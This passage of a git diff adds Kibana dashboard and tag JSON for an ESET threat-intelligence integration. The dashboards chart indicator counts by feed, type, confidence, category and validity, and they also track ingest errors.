"tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + } + }, + "gridData": { + "h": 13, + "i": "990ecf0c-790b-4b0a-94d1-f8d5d154b655", + "w": 21, + "x": 8, + "y": 8 + }, + "panelIndex": "990ecf0c-790b-4b0a-94d1-f8d5d154b655", + "type": "lens", + "version": "8.10.1" + }, + { + 
"embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fa6ca743-61a5-4276-894b-f2478d6ac1c9": { + "columnOrder": [ + "8015bd06-c3b9-492a-9713-31d26536b422", + "ec324dcc-c341-408f-961d-bf050d2ba5f0" + ], + "columns": { + "8015bd06-c3b9-492a-9713-31d26536b422": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "IoC by Category \u003e\u003e Meta category", + "operationType": "terms", + "params": { + "accuracyMode": true, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "eset.meta_category" + ], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "eset.category" + }, + "ec324dcc-c341-408f-961d-bf050d2ba5f0": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "left", + "colorMode": "none", + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422", + "oneClickFilter": false, + "width": 1447.5 + }, + { + "alignment": 
"left", + "colorMode": "none", + "columnId": "ec324dcc-c341-408f-961d-bf050d2ba5f0" + } + ], + "layerId": "fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "layerType": "data", + "sorting": { + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422" + } + } + }, + "title": "Indicators description (copy) (converted)", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 13, + "i": "37dab396-d238-4569-8051-4850ada0fd4a", + "w": 19, + "x": 29, + "y": 8 + }, + "panelIndex": "37dab396-d238-4569-8051-4850ada0fd4a", + "title": "Category \u003e\u003e Meta category", + "type": "lens", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs ESET] Other indicators", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-23T11:38:49.052Z", + "id": "ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3b89b235-df4c-4068-8a24-6426797a082d:indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "36f43892-5ab9-4234-bc5d-234e6e70ab89:indexpattern-datasource-layer-e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e35a1652-3081-4545-a3ef-db0ac8b9b680:indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b4844f80-8d75-4bdb-bba7-9ca56cec45d7:indexpattern-datasource-layer-bb3bb9c5-ae3e-4b2e-9c1b-ec0a24c9b7d1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "990ecf0c-790b-4b0a-94d1-f8d5d154b655:indexpattern-datasource-layer-4cf2e420-ecde-40bc-b31e-13c949179835", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"37dab396-d238-4569-8051-4850ada0fd4a:indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_83a17707-4eb4-41a9-beaa-e72e260453b2:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "name": "tag-ref-ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "type": "tag" + }, + { + "id": "ti_eset-security-solution-default", + "name": "tag-ref-ti_eset-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_eset/kibana/dashboard/ti_eset-f608e350-8192-11ee-a704-a3364df0a052.json b/packages/ti_eset/kibana/dashboard/ti_eset-f608e350-8192-11ee-a704-a3364df0a052.json new file mode 100644 index 00000000000..c6a7b8975ee --- /dev/null +++ b/packages/ti_eset/kibana/dashboard/ti_eset-f608e350-8192-11ee-a704-a3364df0a052.json 
@@ -0,0 +1,1106 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"d17f1bba-6fab-4946-a506-1b42af88c9f3\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d17f1bba-6fab-4946-a506-1b42af88c9f3\",\"fieldName\":\"data_stream.dataset\",\"title\":\"Feed name\",\"grow\":true,\"width\":\"medium\",\"selectedOptions\":[],\"searchTechnique\":\"prefix\",\"exclude\":false,\"enhancements\":{}}},\"2af8943a-8342-462e-be9a-c50fb0418796\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"large\",\"explicitInput\":{\"id\":\"2af8943a-8342-462e-be9a-c50fb0418796\",\"fieldName\":\"threat.indicator.type\",\"title\":\"Indicator type\",\"grow\":true,\"width\":\"large\",\"selectedOptions\":[],\"existsSelected\":false,\"enhancements\":{}}}}" + }, + "description": "Overview dashboard", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "logs-*", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "_index", + "index": "logs-*", + "key": "_index", + "negate": false, + "params": { + "query": "logs-ti_eset_latest.*" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "_index": "logs-ti_eset_latest.*" + } + } + }, + { + "meta": { + "alias": null, + 
"disabled": false, + "field": "data_stream.dataset", + "index": "logs-*", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "ti_eset.botnet", + "ti_eset.cc", + "ti_eset.domains", + "ti_eset.files", + "ti_eset.ip", + "ti_eset.url", + "ti_eset.apt" + ], + "type": "phrases", + "value": [ + "ti_eset.botnet", + "ti_eset.cc", + "ti_eset.domains", + "ti_eset.files", + "ti_eset.ip", + "ti_eset.url", + "ti_eset.apt" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "ti_eset.botnet" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.cc" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.domains" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.files" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.ip" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.url" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.apt" + } + } + ] + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "#### ESET Threat Intelligence\n**Navigation**\n\n- **[Overview (This page)](/app/dashboards#/view/f608e350-8192-11ee-a704-a3364df0a052)**\n- [Domains, URL, IP](/app/dashboards#/view/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052)\n- [Files](/app/dashboards#/view/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052)\n- [Other 
indicators](/app/dashboards#/view/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052)\n\n[Integrations Page](/app/integrations/detail/ti_eset/overview)\n\nThis overview dashboard displays overall health of the indicators .\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 20, + "i": "12ef4ff0-73cb-4d95-b80c-dc7c359536b0", + "w": 8, + "x": 0, + "y": 0 + }, + "panelIndex": "12ef4ff0-73cb-4d95-b80c-dc7c359536b0", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1868c04a-6800-40dd-823d-e98338bce34d": { + "columnOrder": [ + "e1d22239-a0a9-473e-830f-641833926a58", + "5694cc0b-49d8-402b-9e86-4925f48c3eca" + ], + "columns": { + "5694cc0b-49d8-402b-9e86-4925f48c3eca": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "e1d22239-a0a9-473e-830f-641833926a58": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.indicator.confidence", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5694cc0b-49d8-402b-9e86-4925f48c3eca", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.confidence" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": 
[], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "1868c04a-6800-40dd-823d-e98338bce34d", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "large", + "metrics": [ + "5694cc0b-49d8-402b-9e86-4925f48c3eca" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "e1d22239-a0a9-473e-830f-641833926a58" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "1d821e2b-cbfd-4dae-842a-027900f8bb90", + "w": 12, + "x": 8, + "y": 0 + }, + "panelIndex": "1d821e2b-cbfd-4dae-842a-027900f8bb90", + "title": "Total indicators by confidence", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f7157ad3-4c27-4258-9277-bfb6584d2722", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f7157ad3-4c27-4258-9277-bfb6584d2722": { + "columnOrder": [ + "332d5791-841c-4042-ba39-5d54958efb7e" + ], + "columns": { + "332d5791-841c-4042-ba39-5d54958efb7e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "eset.valid_until \u003e= now" + }, + "isBucketed": false, + "label": "Total valid indicators", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "332d5791-841c-4042-ba39-5d54958efb7e", + "layerId": 
"f7157ad3-4c27-4258-9277-bfb6584d2722", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 6, + "i": "8d48bfca-9525-437d-bd0a-e0e2e4505e43", + "w": 14, + "x": 20, + "y": 0 + }, + "panelIndex": "8d48bfca-9525-437d-bd0a-e0e2e4505e43", + "title": "Total valid indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f7157ad3-4c27-4258-9277-bfb6584d2722", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f7157ad3-4c27-4258-9277-bfb6584d2722": { + "columnOrder": [ + "332d5791-841c-4042-ba39-5d54958efb7e" + ], + "columns": { + "332d5791-841c-4042-ba39-5d54958efb7e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "eset.valid_until \u003c now" + }, + "isBucketed": false, + "label": "Total expired indicators", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "332d5791-841c-4042-ba39-5d54958efb7e", + "layerId": "f7157ad3-4c27-4258-9277-bfb6584d2722", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 6, + "i": "ae75a79d-2f96-4b59-a16b-4e9b808b6e88", + "w": 14, + "x": 34, 
+ "y": 0 + }, + "panelIndex": "ae75a79d-2f96-4b59-a16b-4e9b808b6e88", + "title": "Total outdated indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "64456774-43b8-4d8f-9a5c-9b5319376d4e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1868c04a-6800-40dd-823d-e98338bce34d": { + "columnOrder": [ + "9977775d-6e5a-4cfa-a036-bd7cba7de7a6", + "5943c5c2-3afc-4a16-b518-0e1344c3b8f8", + "44a7904b-22db-46e7-b45b-9ff5fe9b632c" + ], + "columns": { + "44a7904b-22db-46e7-b45b-9ff5fe9b632c": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "5943c5c2-3afc-4a16-b518-0e1344c3b8f8": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.feed.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "44a7904b-22db-46e7-b45b-9ff5fe9b632c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + }, + "9977775d-6e5a-4cfa-a036-bd7cba7de7a6": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + 
"layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "64456774-43b8-4d8f-9a5c-9b5319376d4e", + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "logs-*", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "logs-*", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "ti_eset.botnet", + "ti_eset.cc", + "ti_eset.domains", + "ti_eset.files", + "ti_eset.url", + "ti_eset.apt" + ], + "type": "phrases", + "value": [ + "ti_eset.botnet", + "ti_eset.cc", + "ti_eset.domains", + "ti_eset.files", + "ti_eset.url", + "ti_eset.apt" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "ti_eset.botnet" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.cc" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.domains" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.files" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.url" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.apt" + } + } + ] + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + 
"44a7904b-22db-46e7-b45b-9ff5fe9b632c" + ], + "layerId": "1868c04a-6800-40dd-823d-e98338bce34d", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "5943c5c2-3afc-4a16-b518-0e1344c3b8f8", + "xAccessor": "9977775d-6e5a-4cfa-a036-bd7cba7de7a6" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "80c3c330-8693-4eae-9036-6aea2cbe0d9a", + "w": 28, + "x": 20, + "y": 6 + }, + "panelIndex": "80c3c330-8693-4eae-9036-6aea2cbe0d9a", + "title": "Total indicators per feed", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f0a5b3e6-b768-4abb-9ff5-66cadc9942cc", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f0a5b3e6-b768-4abb-9ff5-66cadc9942cc": { + "columnOrder": [ + "15573c0f-2580-4376-89e4-79e6500793c4", + "16358bb1-d5ec-4074-b4d9-ad2f0f69a91b" + ], + "columns": { + "15573c0f-2580-4376-89e4-79e6500793c4": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.indicator.type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "16358bb1-d5ec-4074-b4d9-ad2f0f69a91b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + 
"16358bb1-d5ec-4074-b4d9-ad2f0f69a91b": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "f0a5b3e6-b768-4abb-9ff5-66cadc9942cc", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "large", + "metrics": [ + "16358bb1-d5ec-4074-b4d9-ad2f0f69a91b" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "15573c0f-2580-4376-89e4-79e6500793c4" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "94c720b4-1aa4-4dd6-b9fc-05e1757ece34", + "w": 12, + "x": 8, + "y": 10 + }, + "panelIndex": "94c720b4-1aa4-4dd6-b9fc-05e1757ece34", + "title": "Indicators distribution per type", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1868c04a-6800-40dd-823d-e98338bce34d": { + "columnOrder": [ + "9977775d-6e5a-4cfa-a036-bd7cba7de7a6", + "5943c5c2-3afc-4a16-b518-0e1344c3b8f8", + "44a7904b-22db-46e7-b45b-9ff5fe9b632c" + ], + "columns": { + "44a7904b-22db-46e7-b45b-9ff5fe9b632c": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "error.message : * " + }, + "isBucketed": false, + "label": "Count of 
records", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "5943c5c2-3afc-4a16-b518-0e1344c3b8f8": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.feed.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "44a7904b-22db-46e7-b45b-9ff5fe9b632c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + }, + "9977775d-6e5a-4cfa-a036-bd7cba7de7a6": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "44a7904b-22db-46e7-b45b-9ff5fe9b632c" + ], + "layerId": "1868c04a-6800-40dd-823d-e98338bce34d", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "5943c5c2-3afc-4a16-b518-0e1344c3b8f8", + "xAccessor": "9977775d-6e5a-4cfa-a036-bd7cba7de7a6" + } + ], + "legend": { + "isVisible": true, + "legendSize": 
"large", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [ + { + "action": { + "config": { + "openInNewTab": true + }, + "factoryId": "OPEN_IN_DISCOVER_DRILLDOWN", + "name": "Open in Discover" + }, + "eventId": "1e679208-c884-4951-8a23-18232324b255", + "triggers": [ + "FILTER_TRIGGER" + ] + } + ] + } + }, + "hidePanelTitles": false + }, + "gridData": { + "h": 11, + "i": "9911bc43-dc3b-4f43-acaf-839c7733ca4b", + "w": 40, + "x": 8, + "y": 20 + }, + "panelIndex": "9911bc43-dc3b-4f43-acaf-839c7733ca4b", + "title": "Total ingest pipeline errors", + "type": "lens", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs ESET] Overview ", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-23T11:24:48.387Z", + "id": "ti_eset-f608e350-8192-11ee-a704-a3364df0a052", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1d821e2b-cbfd-4dae-842a-027900f8bb90:indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8d48bfca-9525-437d-bd0a-e0e2e4505e43:indexpattern-datasource-layer-f7157ad3-4c27-4258-9277-bfb6584d2722", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ae75a79d-2f96-4b59-a16b-4e9b808b6e88:indexpattern-datasource-layer-f7157ad3-4c27-4258-9277-bfb6584d2722", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "80c3c330-8693-4eae-9036-6aea2cbe0d9a:indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"80c3c330-8693-4eae-9036-6aea2cbe0d9a:64456774-43b8-4d8f-9a5c-9b5319376d4e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "94c720b4-1aa4-4dd6-b9fc-05e1757ece34:indexpattern-datasource-layer-f0a5b3e6-b768-4abb-9ff5-66cadc9942cc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9911bc43-dc3b-4f43-acaf-839c7733ca4b:indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_d17f1bba-6fab-4946-a506-1b42af88c9f3:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_2af8943a-8342-462e-be9a-c50fb0418796:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "name": "tag-ref-ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "type": "tag" + }, + { + "id": "ti_eset-security-solution-default", + "name": "tag-ref-ti_eset-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_eset/kibana/tag/ti_eset-ed13a500-8192-11ee-a704-a3364df0a052.json b/packages/ti_eset/kibana/tag/ti_eset-ed13a500-8192-11ee-a704-a3364df0a052.json new file mode 100644 index 00000000000..5966e6f031c --- /dev/null +++ b/packages/ti_eset/kibana/tag/ti_eset-ed13a500-8192-11ee-a704-a3364df0a052.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#0A6A71", + "description": "", + "name": "ESET" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-19T19:19:47.379Z", + "id": "ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "managed": true, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/ti_eset/kibana/tag/ti_eset-security-solution-default.json b/packages/ti_eset/kibana/tag/ti_eset-security-solution-default.json new file mode 100644 index 00000000000..516ee120b3c --- /dev/null 
